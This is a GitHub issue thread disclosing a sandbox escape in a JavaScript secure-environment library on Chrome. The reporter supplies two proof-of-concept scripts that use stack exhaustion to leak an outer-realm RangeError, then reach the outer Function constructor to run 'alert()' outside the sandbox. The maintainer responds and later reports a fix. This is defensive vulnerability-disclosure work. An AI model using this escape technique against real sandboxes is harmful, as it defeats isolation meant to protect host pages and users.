### ISSUE TITLE
Escapable via RangeError caused by stack overflow on chrome

### ISSUE THREAD

**Issue by mmis1000** [caridy/secure-javascript-environment#48]
## Problem

It turns out chrome decide the prototype of `RangeError` by the `function being called` instead of `caller`. 

So the `RangeError` behaves like a unforgeable hidden property on function. And can be exploited by stack overflow.

Maybe we should also add this to the [proposal-preserve-virtualizability](https://github.com/Agoric/proposal-preserve-virtualizability).

Or better, open another PR to standardize stack overflow behavior to stop similar problem once and for all.

## POC

```js
import createSecureEnvironment from '../lib/browser-realm.js';

function distortionCallback(t) {
    if (t === alert) {
        return () => {
            console.error('forbidden');
        }
    }
    return t;
}

const secureGlobalThis = createSecureEnvironment(distortionCallback);

secureGlobalThis.eval(`
    debugger;

    function getLimit (depth = 1) {
        try {
            return getLimit(depth + 1)
        } catch (err) {
            return depth
        }
    }

    console.log(getLimit())

    let err

    function exhaust(depth, cb) {
        try {
            if (depth > 0) {
                exhaust(depth - 1, cb)
            } else {
                cb('something')
            }
        } catch (_err) {
            err =_err
        }
    }

    const log = console.log

    exhaust(getLimit() - 1, log)

    debugger

    console.log(err, err instanceof RangeError)
    console.log((new (err.constructor.constructor('alert()')))())

    debugger
`);
```

Tested on chrome 78.0.3904.108 

May be also exploitable on firefox, but firefox randomized the stack size. So these kind of exploit can't be done reliable. (Will likely requires thousands of try, and each one only has 0.01% chance to exploit the problem successfully)

## Potential workaround (because it isn't really fixable)

Instead of construct the proxy and proxy handler inside the main document, construct them in the iframe and use rpc style payload to exchange information with main document.

(So you at least won't leak main document's reference to the sandboxed code directly)

[Similar experiment project I wrote](https://github.com/mmis1000/secure-ecmascript-sandbox#architecture)

## Conclusion

It means (on chrome) you are all set if any function reference construct in main window was exposed to the iframe, because the iframe don't even need to run the function body to exploit the RangeError

**Comment by caridy** [comment]
@mmis1000 good timing, I'm currently working on the error boundaries in #47, still not quite ready, but I think it should be able to cover for this one, I will keep you posted. Btw, thanks for the help and the link, I will definitely take a look at that project.

**Comment by mmis1000** [comment]
Looks like #47 did not address this issue correctly, the first line `err instanceof RangeError` is success fully blocked.

But the second line still works.

Maybe you need to also make the `proxy.[[proxyJandlers]].[[whatever trap]]` spawn in the sandbox to stop this.

Poc

```js
import createSecureEnvironment from '../lib/browser-realm.js';


const distortionMap = new Map([
    [alert, () => {
        console.error('forbidden');
        return () => null
    }],
]);

const secureGlobalThis = createSecureEnvironment(distortionMap);

secureGlobalThis.eval(`
    debugger;

    function getLimit (depth = 1) {
        try {
            return getLimit(depth + 1)
        } catch (err) {
            return depth
        }
    }

    console.log(getLimit())

    let err

    function exhaust(depth, cb) {
        try {
            if (depth > 0) {
                exhaust(depth - 1, cb)
            } else {
                cb('something')
            }
        } catch (_err) {
            err =_err
        }
    }

    const log = console.log

    exhaust(getLimit() - 1, log)

    debugger

    console.log((new err.constructor.constructor('alert()')()))

    debugger
`);

```

**Comment by caridy** [comment]
@mmis1000 yes, that PR didn't cover all the cases, specially the cases of stack overflow. Still working on it, that's why this is still open :)

There are 2 challenges that are completely different:

1. the initiator of the evaluation was the outer realm, and we need a way to control the leakage of such errors, that's the easy one (PR is coming today).
2. the initiator of the invocation was the outer realm, and a stack overflow occurred, leaking an RangeError from the outer realm. This is the most complicated one, and we don't have a clear reliable solution yet. Your `secureWrapper` gist looks intriguing, I will spend time on it today, we will see.

**Comment by caridy** [comment]
@mmis1000 this is now fixed in master, we will not release to npm just yet, it will take few more days. We also have identify some other related attacks that we are planning to fix very soon. I'm working in another PR for that, and once that's merged, we will release to NPM.

Again, thanks a lot for providing all the details about this, he helped a lot. I'm also available to discuss the solution that we put in place if you want to. I have added an example with your code, and few tests, to validate it.
